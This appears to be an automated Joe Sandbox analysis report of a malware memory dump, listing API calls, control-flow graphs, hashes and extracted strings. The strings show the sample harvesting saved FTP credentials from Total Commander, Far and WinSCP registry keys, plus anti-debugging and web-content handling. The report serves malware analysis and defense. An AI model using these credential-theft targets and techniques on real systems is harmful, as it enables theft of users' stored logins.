                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfile$String$AllocHeap$CombinePath
                          • String ID: ftp://%s:%s@%s:%u$pass$port$user
                          • API String ID: 3432043379-2696999094
                          • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                          • Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                          • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                          • Sleep.KERNEL32(00000000), ref: 00408342
                          • Sleep.KERNEL32(00000000), ref: 00408377
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                          • FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                          • String ID: .$.$.8@$.8@
                          • API String ID: 2348139788-2639049386
                          • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                          • Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                          • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                          • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                          • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 174 40b096-40b0ac call 40d5b0 177 40b0b5-40b0bb 174->177 178 40b0ae-40b0b0 174->178 180 40b0bd-40b0cd call 407995 177->180 181 40b0cf-40b0d1 call 407951 177->181 179 40b2c9-40b2cd 178->179 185 40b0d6-40b0e5 180->185 181->185 186 40b160-40b166 185->186 187 40b0e7-40b0f1 185->187 189 40b177 InternetClearAllPerSiteCookieDecisions 186->189 190 40b168-40b175 InternetSetPerSiteCookieDecisionW 186->190 187->186 188 40b0f3-40b0f9 187->188 188->186 192 40b0fb-40b10b GetModuleFileNameW 188->192 191 40b17d-40b184 call 4032b8 189->191 190->191 199 40b186-40b196 GetLastError call 40a786 191->199 200 40b199-40b1a2 191->200 194 40b116-40b118 GetCurrentDirectoryW 192->194 195 40b10d-40b114 call 406cf9 192->195 198 40b11e-40b15a call 405511 call 4054ed call 40253c 194->198 195->198 198->178 198->186 199->200 204 40b1a9-40b1ae 200->204 207 40b1b0-40b1cd CreateThread 204->207 208 40b1ce-40b1df 204->208 207->208 208->204 210 40b1e1-40b1e7 208->210 212 40b1e9-40b1eb 210->212 213 40b1ed-40b200 call 40a786 210->213 212->213 215 40b221-40b226 212->215 222 40b202-40b209 call 40b023 213->222 223 40b20e-40b210 213->223 218 40b228-40b23b CloseHandle 215->218 219 40b23d-40b24b call 40a6c9 InternetClearAllPerSiteCookieDecisions 215->219 218->218 218->219 227 40b2c6-40b2c8 219->227 228 40b24d-40b257 219->228 222->223 223->215 225 40b212-40b21b WaitForMultipleObjects 223->225 225->215 227->179 228->227 229 40b259-40b25f 228->229 229->227 230 40b261-40b271 GetModuleFileNameW 229->230 231 40b273-40b27a call 406cf9 230->231 232 40b27c-40b27e GetCurrentDirectoryW 230->232 234 40b284-40b2c0 call 405511 call 4054ed call 40253c 231->234 232->234 234->178 234->227
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                          • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                          • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                          • String ID: \netprotdrvss.exe$begun.ru
                          • API String ID: 2887986221-2660752650
                          • Opcode ID: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                          • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                          • Opcode Fuzzy Hash: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                          • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 242 403c10-403c73 call 40be9d call 405511 * 2 call 40848f 251 403c75-403c77 242->251 252 403ca9-403cad 242->252 251->252 253 403c79-403c94 ExpandEnvironmentStringsW 251->253 254 403cb3-403d15 call 405511 * 3 252->254 255 403dfe 252->255 256 403c95 call 4039ea 253->256 271 403d18-403d34 SHGetFolderPathW 254->271 257 403e00-403e08 call 4033a0 255->257 258 403e0a-403e12 call 40be3a 255->258 260 403c9a-403ca3 PathRemoveFileSpecW 256->260 267 403e13-403e17 257->267 258->267 260->252 272 403d36-403d39 271->272 273 403d7f-403d86 271->273 275 403d5a 272->275 276 403d3b-403d58 call 4039a3 272->276 273->271 274 403d88-403d8c 273->274 274->255 279 403d8e-403dce call 405511 * 2 call 40848f 274->279 278 403d5c-403d76 275->278 276->278 281 403d77 call 408248 278->281 289 403dd0-403dd2 279->289 290 403dfa 279->290 283 403d7c 281->283 283->273 289->290 291 403dd4-403df7 ExpandEnvironmentStringsW call 4039a3 289->291 290->255 291->290
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                          • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                          • API String ID: 2046068145-3914982127
                          • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                          • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 403 4027e6-402809 OleInitialize call 40a469 406 402813-402819 403->406 407 40280b-40280e 403->407 409 402820-402832 call 405511 406->409 410 40281b-40281e 406->410 408 402c2d-402c31 407->408 411 402838-40284f call 40a345 409->411 410->409 410->411 416 402851 411->416 417 40285f-402862 411->417 418 402852 call 40a65e 416->418 419 402864-402867 417->419 420 402869 417->420 421 402857-40285a 418->421 419->420 422 402879-40287d 419->422 423 402869 call 4072ed 420->423 426 402c2c 421->426 425 40287f call 409f2b 422->425 424 40286e-402873 423->424 424->422 427 402884-402888 425->427 426->408 428 402893-4028a0 427->428 429 40288a-40288d 427->429 431 4028a2-4028ad 428->431 432 4028b7-4028be 428->432 429->428 430 40296a 429->430 435 402970-402978 430->435 433 4028af call 408f26 431->433 432->430 434 4028c4-4028cc 432->434 436 4028b4 433->436 437 4028d3-4028e3 434->437 438 4028ce 434->438 439 402c20-402c23 435->439 440 40297e-402984 435->440 436->432 441 4028e5 call 408f26 437->441 438->437 442 402c25 call 40a65e 439->442 443 402986-4029a2 call 40a569 440->443 444 4029bc-4029c0 440->444 448 4028ea-4028ef 441->448 449 402c2a 442->449 457 4029a5 call 4089fd 443->457 446 4029c2-4029de call 40a569 444->446 447 4029f8-4029fc 444->447 467 4029e1 call 4089fd 446->467 452 402a04-402a0c 447->452 453 4029fe-402a02 447->453 454 4028f1-402925 call 407573 SysAllocString 448->454 455 402956-402957 448->455 449->426 460 402a3b-402a44 452->460 461 402a0e-402a35 call 40920a call 409c49 SysAllocString SysFreeString 452->461 453->452 453->460 470 402927-402938 SysFreeString 454->470 471 40293a-402941 454->471 459 402959 call 40a65e 455->459 464 4029aa-4029b8 457->464 468 40295e 459->468 465 402a46-402a5a 460->465 466 402a6f-402a73 460->466 461->460 464->444 472 402a5d call 408f26 465->472 473 402aa2-402aa6 466->473 474 402a75-402a8d 466->474 475 4029e6-4029f4 467->475 468->430 470->470 470->471 477 402943-402945 471->477 478 402947-40294a call 4091bd 471->478 479 402a62-402a6c SysAllocString 472->479 481 402ad1-402ad5 473->481 482 402aa8-402abc 473->482 480 402a90 call 408f26 474->480 475->447 486 40294f-402954 477->486 478->486 479->466 488 402a95-402a9f SysAllocString 480->488 483 402b04-402b07 481->483 484 402ad7-402aef 481->484 489 402abf call 408f26 482->489 491 402b09 call 40a65e 483->491 490 402af2 call 408f26 484->490 486->435 488->473 492 402ac4-402ace SysAllocString 489->492 493 402af7-402b01 SysAllocString 490->493 494 402b0e-402b11 491->494 492->481 493->483 495 402b13 494->495 496 402b1a-402b2d 494->496 495->496 497 402b49-402b4d 496->497 498 402b2f-402b47 call 407573 496->498 500 402b55-402b66 call 407573 call 409c49 497->500 501 402b4f-402b53 497->501 498->497 504 402b6b-402b6f 500->504 501->500 501->504 506 402b71-402b7e call 40584d call 409c49 504->506 507 402b83-402b87 504->507 506->507 510 402b89-402b9c call 407573 507->510 511 402b9e-402ba2 507->511 510->511 514 402ba4-402bad call 40584d 511->514 515 402baf-402be1 call 40584d 511->515 514->515 522 402be3-402be8 call 408825 515->522 523 402bea call 408692 515->523 527 402bef-402bf8 522->527 523->527 528 402bfa-402bfd 527->528 529 402bff 527->529 528->529 530 402c01-402c0f SysFreeString 528->530 529->530 530->439 531 402c11-402c1e SysFreeString 530->531 531->439 531->531
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 004027F5
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Internet$InitializeOpenOption
                          • String ID: From: true
                          • API String ID: 1176259655-9585188
                          • Opcode ID: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                          • Opcode Fuzzy Hash: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 532 402e3e-402e59 call 40d5b0 535 40327e-403286 532->535 536 402e5f-402e60 532->536 537 402e61-402ea5 call 40586b call 4058fb 536->537 542 402eb4 537->542 543 402ea7-402ead 537->543 545 402eb7-402ecb GetModuleFileNameW 542->545 543->542 544 402eaf-402eb2 543->544 544->545 546 402ed6-402edc GetCurrentDirectoryW 545->546 547 402ecd-402ed4 call 406cf9 545->547 549 402ee2-402f14 call 405511 call 4054ed * 2 546->549 547->549 557 402f16-402f22 call 405467 549->557 558 402f2a-402f94 GetLastError call 40a786 call 407552 call 405511 call 40584d 549->558 557->558 563 402f24 557->563 570 402f96-402fa6 558->570 571 402fa8 call 4056f9 558->571 563->558 572 402fad-402fd8 call 4054ed * 2 call 40584d 570->572 571->572 580 402fda-402fea 572->580 581 402fec call 4056f9 572->581 582 402ff1-403038 call 4054ed * 2 call 405511 call 4054ed 580->582 581->582 592 40303a-40304a 582->592 593 40304c call 4056f9 582->593 594 403051-403081 call 4054ed * 3 call 40584d 592->594 593->594 604 403083-403093 594->604 605 403095-40309b call 4056f9 594->605 606 4030a0-403132 call 405451 call 406d42 call 405511 call 4054ed * 4 call 40253c 604->606 605->606 624 403251-40325f GetLastError 606->624 625 403138-40313e 606->625 628 403262-403276 call 40a786 624->628 626 403144-403148 625->626 627 40322d-403235 625->627 626->627 631 40314e-403186 call 40584d call 407552 call 405511 call 40584d 626->631 629 403241 627->629 630 403237-40323f GetLastError 627->630 628->537 637 40327c-40327d 628->637 633 403244-40324f 629->633 630->633 644 403188-403198 631->644 645 40319a call 4056f9 631->645 633->628 637->535 646 40319f-4031c8 call 4054ed * 2 call 40584d 644->646 645->646 654 4031ca-4031da 646->654 655 4031dc call 4056f9 646->655 656 4031e1-403228 call 4054ed * 2 call 40253c 654->656 655->656 656->624 664 40322a 656->664 664->627
                          APIs
                            • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                          • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                          • GetLastError.KERNEL32(?), ref: 00402F4E
                          • GetLastError.KERNEL32 ref: 00403237
                          • GetLastError.KERNEL32(?), ref: 00403258
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                          • String ID: .html$From: $Via: $^client=$^key=$file$none
                          • API String ID: 2247176544-3749385445
                          • Opcode ID: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                          • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                          • Opcode Fuzzy Hash: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                          • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                          • RegCloseKey.ADVAPI32(?), ref: 0040442A
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapOpen$AllocCloseEnumFree
                          • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                          • API String ID: 416369273-4007225339
                          • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                          • Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                          • RegCloseKey.ADVAPI32(?), ref: 0040476D
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocCloseEnumHeapOpen
                          • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                          • API String ID: 3497950970-285550827
                          • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                          • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                          APIs
                          • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                          • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                          • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                          • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                          • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                          • String ID: hOA
                          • API String ID: 1355009786-3485425990
                          • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                          • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54
                          APIs
                          • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                          • SysFreeString.OLEAUT32(?), ref: 00409359
                          • SysFreeString.OLEAUT32(?), ref: 00409362
                          • SysAllocString.OLEAUT32(?), ref: 004093B8
                          • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$Free$Alloc$CharLower
                          • String ID: http:$javascript$+@
                          • API String ID: 1987340527-3375436608
                          • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                          • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                          APIs
                          • DeleteFileW.KERNEL32(00000000,771B0F00), ref: 00407043
                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                          • GetLastError.KERNEL32(00000000), ref: 00407079
                          • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                          • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                          • CloseHandle.KERNEL32(00000000), ref: 004070BB
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                          • String ID:
                          • API String ID: 3711279109-0
                          • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                          • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountTick
                          • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                          • API String ID: 536389180-697497794
                          • Opcode ID: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                          • Opcode Fuzzy Hash: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                          • API String ID: 3472027048-2333287219
                          • Opcode ID: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                          • Opcode Fuzzy Hash: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                          APIs
                          • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID: _self$http$+@
                          • API String ID: 1473721057-3317424838
                          • Opcode ID: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                          • Opcode Fuzzy Hash: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                          • API String ID: 3546245721-1332223170
                          • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                          • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                          APIs
